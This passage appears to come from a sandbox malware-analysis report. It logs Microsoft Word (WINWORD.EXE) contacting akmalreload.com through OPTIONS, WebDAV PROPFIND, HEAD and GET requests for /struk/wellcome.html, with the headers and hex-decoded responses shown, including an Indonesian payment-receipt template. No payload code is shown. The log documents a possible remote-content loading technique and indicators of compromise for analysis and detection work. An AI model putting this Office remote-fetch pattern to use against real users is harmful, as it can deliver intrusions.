      Jul 21, 2022 14:27:42.729373932 CEST8.8.8.8192.168.2.220x4c7aNo error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:42.755990982 CEST8.8.8.8192.168.2.220x288aNo error (0)akmalreload.com104.21.73.122A (IP address)IN (0x0001)
      Jul 21, 2022 14:27:42.755990982 CEST8.8.8.8192.168.2.220x288aNo error (0)akmalreload.com172.67.190.5A (IP address)IN (0x0001)

      HTTP Request Dependency Graph

      • akmalreload.com

      HTTPS Proxied Packets

      Session IDSource IPSource PortDestination IPDestination PortProcess
      0192.168.2.2249171104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:15 UTC0OUTOPTIONS /struk/ HTTP/1.1
      User-Agent: Microsoft Office Protocol Discovery
      Host: akmalreload.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-07-21 12:27:16 UTC0INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:16 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      vary: Accept-Encoding
      dn-request-id: 3468eec52ad416218ae7703cec47d24e
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FIiCxFwFu7VICFUUmAvx1aziNnMf9eW8fX%2B1OJ4%2BHwixHG5NuINCv82xPr0qh996WFAl5wc9fbd93rffbQsb9Gb1nikbTfGJGsvp6wCMZ6MrDJoD5cu8n736FQewOYintac%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee011b668877-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:16 UTC1INData Raw: 31 35 33 0d 0a 7b 22 30 22 3a 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 4b 4f 4e 54 45 52 20 5c 6e 53 54 52 55 4b 20 50 45 4d 42 41 59 41 52 41 4e 5c 6e 54 41 47 49 48 41 4e 20 54 56 5c 6e 20 20 20 20 5c 6e 54 41 4e 47 47 41 4c 20 20 20 20 3a 20 5c 6e 49 44 20 50 45 4c 20 20 20 20 20 3a 20 5c 6e 4e 41 4d 41 20 20 20 20 20 20 20 3a 20 50 75 6c 73 61 20 30 5c 6e 50 45 52 49 4f 44 45 20 20 20 20 3a 20 5c 6e 52 50 20 54 41 47 20 20 20 20 20 3a 20 52 70 20 5c 6e 41 44 4d 49 4e 20 42 41 4e 4b 20 3a 20 52 70 20 5c 6e 52 50 20 42 41 59 41 52 20 20 20 3a 20 52 70 20 5c 6e 52 45 46 20 20 20 20 20 20 20 20 3a 20 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 5c 6e 5c 6e 54 65 72 69 6d 61 6b 61 73 69 68 20 61 74 61 73 20 6b 65 70 65 72 63 61 79 61 61 6e 20 41 6e 64 61 20 6d
      Data Ascii: 153{"0":{"content":"KONTER \nSTRUK PEMBAYARAN\nTAGIHAN TV\n \nTANGGAL : \nID PEL : \nNAMA : Pulsa 0\nPERIODE : \nRP TAG : Rp \nADMIN BANK : Rp \nRP BAYAR : Rp \nREF : \n \n\nTerimakasih atas kepercayaan Anda m
      2022-07-21 12:27:16 UTC1INData Raw: 6e 69 20 73 65 62 61 67 61 69 20 62 75 6b 74 69 20 70 65 6d 62 61 79 61 72 61 6e 20 79 61 6e 67 20 73 61 68 2e 5c 6e 5c 6e 22 7d 7d 0d 0a
      Data Ascii: ni sebagai bukti pembayaran yang sah.\n\n"}}
      2022-07-21 12:27:16 UTC1INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      1192.168.2.2249172104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:23 UTC1OUTHEAD /struk/wellcome.html HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft Office Existence Discovery
      Host: akmalreload.com
      2022-07-21 12:27:24 UTC1INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:24 GMT
      Content-Type: text/html; charset=utf-8
      Connection: close
      vary: Accept-Encoding
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: c0c25530e3b6a80bdf0bcb4b13c8b882
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:23 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eIMWvdyIK56jTasun0oamQDcKsYAekpzFulB%2FI73Wbe%2Fw%2BZl6waqiuV4ZmXUj9JDydcluHG9g0Y599%2F77Oo1XgNB3H%2BdklzWm1XSGttL51FD03eLxlfzJAu%2FF03zzBepKW4%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee313ff0e660-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortProcess
      10192.168.2.2249181104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:38 UTC21OUTHEAD /struk/wellcome.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: akmalreload.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-07-21 12:27:39 UTC22INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:39 GMT
      Content-Type: text/html; charset=utf-8
      Connection: close
      vary: Accept-Encoding
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: a9370f98e8473682341a02b9d887a1b6
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:38 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rmxp4mZ1xLG7qJZVnd1m8lKFcHtZgopWF%2B8Rq4ya%2FSOkmf0QbUp50U%2BTqI8kE%2BuRlCQPF3ewj6MTLLDmj6vWQsAeRr9INASey30ExdzyegsOxhFRt8MLAi92%2B1XdABKnzJE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee8efdc0f3eb-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortProcess
      11192.168.2.2249182172.67.190.5443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:39 UTC23OUTHEAD /struk/wellcome.html HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Microsoft Office Existence Discovery
      Host: akmalreload.com
      2022-07-21 12:27:39 UTC23INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:39 GMT
      Content-Type: text/html; charset=utf-8
      Connection: close
      vary: Accept-Encoding
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: a48ecd037482dc70b3f8efca9419b472
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:38 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8DmnhwFY%2FsdWkbSeiwbr%2FydUs5Ti9OqqMQ5%2FPPnlzHsOBcRtQdhOc23MBb1uOwywhA88rfF%2BoGiVrTL29HZflSsiIe2dBpxTF6QbxZehliCrzZs5ZKS8k98PJRlbCXTexwI%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee92b83c71aa-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortProcess
      12192.168.2.2249183172.67.190.5443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:40 UTC24OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:41 UTC24INHTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Jul 2022 12:27:41 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      location: https://akmalreload.com/struk/
      dn-request-id: 893c3a75c3c4294f3ffb154eaf5474ee
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1LDtTzvTcsjebM%2BBFM4NVcNXacNSS6u%2B4wQ%2Fl9ZRfYzpnnqo6aAfzjw%2B4MTe4gvTcLQBk0DgZRBGGqAO0Yun9Cflsk1D4QPPE%2FF0h5kIuttuf5vFCHtovHbcNCcfNyZrrD4%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee9cfa8f71cf-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:41 UTC25INData Raw: 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 2f 73 74 72 75 6b 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
      Data Ascii: ee<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://akmalreload.com/struk/">here</a>.</p></body></html>
      2022-07-21 12:27:41 UTC25INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      13192.168.2.2249184172.67.190.5443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:41 UTC25OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:41 UTC26INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:41 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      vary: Accept-Encoding
      dn-request-id: 7ec72182a1dd7c500e7e457c911429c9
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5pZ0xSWS4SU5%2F%2BlBmaLuO1k%2FVJ8ZW%2BaF2V%2FPRYGJ3NqmcSf7OSL%2BY90nJL1caxJ3NRxJfnp%2BiEX3tQ0pkCWEr5I3omNAyq%2Fm8GYib3%2FhR659Vr498c3fCVRmC7%2BB%2BfzVK0%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3ee9f5e087199-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:41 UTC27INData Raw: 31 35 33 0d 0a 7b 22 30 22 3a 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 4b 4f 4e 54 45 52 20 5c 6e 53 54 52 55 4b 20 50 45 4d 42 41 59 41 52 41 4e 5c 6e 54 41 47 49 48 41 4e 20 54 56 5c 6e 20 20 20 20 5c 6e 54 41 4e 47 47 41 4c 20 20 20 20 3a 20 5c 6e 49 44 20 50 45 4c 20 20 20 20 20 3a 20 5c 6e 4e 41 4d 41 20 20 20 20 20 20 20 3a 20 50 75 6c 73 61 20 30 5c 6e 50 45 52 49 4f 44 45 20 20 20 20 3a 20 5c 6e 52 50 20 54 41 47 20 20 20 20 20 3a 20 52 70 20 5c 6e 41 44 4d 49 4e 20 42 41 4e 4b 20 3a 20 52 70 20 5c 6e 52 50 20 42 41 59 41 52 20 20 20 3a 20 52 70 20 5c 6e 52 45 46 20 20 20 20 20 20 20 20 3a 20 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 5c 6e 5c 6e 54 65 72 69 6d 61 6b 61 73 69 68 20 61 74 61 73 20 6b 65 70 65 72 63 61 79 61 61 6e 20 41 6e 64 61 20 6d
      Data Ascii: 153{"0":{"content":"KONTER \nSTRUK PEMBAYARAN\nTAGIHAN TV\n \nTANGGAL : \nID PEL : \nNAMA : Pulsa 0\nPERIODE : \nRP TAG : Rp \nADMIN BANK : Rp \nRP BAYAR : Rp \nREF : \n \n\nTerimakasih atas kepercayaan Anda m
      2022-07-21 12:27:41 UTC27INData Raw: 6e 53 69 6d 70 61 6e 6c 61 68 20 73 74 72 75 6b 20 69 6e 69 20 73 65 62 61 67 61 69 20 62 75 6b 74 69 20 70 65 6d 62 61 79 61 72 61 6e 20 79 61 6e 67 20 73 61 68 2e 5c 6e 5c 6e 22 7d 7d 0d 0a
      Data Ascii: nSimpanlah struk ini sebagai bukti pembayaran yang sah.\n\n"}}
      2022-07-21 12:27:41 UTC27INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      14192.168.2.2249185172.67.190.5443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:42 UTC27OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:43 UTC27INHTTP/1.1 301 Moved Permanently
      Date: Thu, 21 Jul 2022 12:27:43 GMT
      Content-Type: text/html; charset=iso-8859-1
      Transfer-Encoding: chunked
      Connection: close
      location: https://akmalreload.com/struk/
      dn-request-id: faf7a1dbd204367154e550fb7f4d65c3
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BJQGj6R%2BQurBncVj%2FzRknSpEtRyUIZF%2F6zg0ttOgclwNSRv%2FDckCrD5r8pKgaufxmOYZlIYUYsH8i5vioPzJZX1zvnljw5BLiGCdOsCz%2FUIfG7m%2BQlTpFtZcRgLIwwuIOPI%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3eea9097175bf-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:43 UTC28INData Raw: 65 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 2f 73 74 72 75 6b 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
      Data Ascii: ee<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://akmalreload.com/struk/">here</a>.</p></body></html>
      2022-07-21 12:27:43 UTC29INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      15192.168.2.2249186172.67.190.5443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:44 UTC29OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 74 72 75 6b 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 61 6b 6d 61 6c 72 65 6c 6f 61 64 2e 63 6f 6d 0d 0a 0d 0a
      Data Ascii: PROPFIND /struk/ HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: akmalreload.com
      2022-07-21 12:27:44 UTC29INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:44 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      vary: Accept-Encoding
      dn-request-id: 72eb3a69337e46a2cbdce0a768545547
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TAAU1P4Ghsbqf6rEktnReVh7kOdirZ1a%2FL%2FRwNq2Xi9IHl9xz2c38qpm%2F5Ya7TTGSqgFItO61VDexr%2BxhKiUppHq3f9dSNma6NPvVBsueJQoH2E1TSs8rqfylbNojz0p%2BW0%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3eeb0cfba7583-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
      2022-07-21 12:27:44 UTC30INData Raw: 31 35 33 0d 0a 7b 22 30 22 3a 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 4b 4f 4e 54 45 52 20 5c 6e 53 54 52 55 4b 20 50 45 4d 42 41 59 41 52 41 4e 5c 6e 54 41 47 49 48 41 4e 20 54 56 5c 6e 20 20 20 20 5c 6e 54 41 4e 47 47 41 4c 20 20 20 20 3a 20 5c 6e 49 44 20 50 45 4c 20 20 20 20 20 3a 20 5c 6e 4e 41 4d 41 20 20 20 20 20 20 20 3a 20 50 75 6c 73 61 20 30 5c 6e 50 45 52 49 4f 44 45 20 20 20 20 3a 20 5c 6e 52 50 20 54 41 47 20 20 20 20 20 3a 20 52 70 20 5c 6e 41 44 4d 49 4e 20 42 41 4e 4b 20 3a 20 52 70 20 5c 6e 52 50 20 42 41 59 41 52 20 20 20 3a 20 52 70 20 5c 6e 52 45 46 20 20 20 20 20 20 20 20 3a 20 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 20 5c 6e 5c 6e 54 65 72 69 6d 61 6b 61 73 69 68 20 61 74 61 73 20 6b 65 70 65 72 63 61 79 61 61 6e 20 41 6e 64 61 20 6d
      Data Ascii: 153{"0":{"content":"KONTER \nSTRUK PEMBAYARAN\nTAGIHAN TV\n \nTANGGAL : \nID PEL : \nNAMA : Pulsa 0\nPERIODE : \nRP TAG : Rp \nADMIN BANK : Rp \nRP BAYAR : Rp \nREF : \n \n\nTerimakasih atas kepercayaan Anda m
      2022-07-21 12:27:44 UTC30INData Raw: 74 72 75 6b 20 69 6e 69 20 73 65 62 61 67 61 69 20 62 75 6b 74 69 20 70 65 6d 62 61 79 61 72 61 6e 20 79 61 6e 67 20 73 61 68 2e 5c 6e 5c 6e 22 7d 7d 0d 0a
      Data Ascii: truk ini sebagai bukti pembayaran yang sah.\n\n"}}
      2022-07-21 12:27:44 UTC30INData Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session IDSource IPSource PortDestination IPDestination PortProcess
      16192.168.2.2249187104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:45 UTC30OUTGET /struk/wellcome.html HTTP/1.1
      Accept: */*
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      Host: akmalreload.com
      If-Modified-Since: Wed, 20 Jul 2022 22:09:18 GMT
      Connection: Keep-Alive
      2022-07-21 12:27:45 UTC31INHTTP/1.1 304 Not Modified
      Date: Thu, 21 Jul 2022 12:27:45 GMT
      Connection: close
      last-modified: Wed, 20 Jul 2022 22:09:18 GMT
      dn-request-id: bf202fbd3644dd936a4c7383e5495bb0
      x-frame-options: SAMEORIGIN
      x-xss-protection: 1; mode=block
      x-content-type-options: nosniff
      referrer-policy: strict-origin-when-cross-origin
      content-security-policy: default-src * data: 'unsafe-eval' 'unsafe-inline'
      strict-transport-security: max-age=31536000; includeSubDomains; preload always
      Cache-Control: max-age=2592000
      static-cache-status: BYPASS
      expires: Sat, 20 Aug 2022 12:27:45 GMT
      CF-Cache-Status: DYNAMIC
      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wtSZFebUMwtSQ8x8Hd0cT4gzS3vNrkDFP8eNgb2ad39XCevR7R3IFRwRu9iSpR5XpRaDDoWODoDGcRvLG0CsHbmLL3%2BTTNGqABX3FW%2BNITxIG2AXkXeTMyec6SdIy5UV%2BOU%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 72e3eeb778bc778c-LHR
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400


      Session IDSource IPSource PortDestination IPDestination PortProcess
      17192.168.2.2249188104.21.73.122443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      TimestampkBytes transferredDirectionData
      2022-07-21 12:27:48 UTC32OUTHEAD /struk/wellcome.html HTTP/1.1
      User-Agent: Microsoft Office Existence Discovery
      Host: akmalreload.com
      Content-Length: 0
      Connection: Keep-Alive
      2022-07-21 12:27:49 UTC32INHTTP/1.1 200 OK
      Date: Thu, 21 Jul 2022 12:27:49 GMT
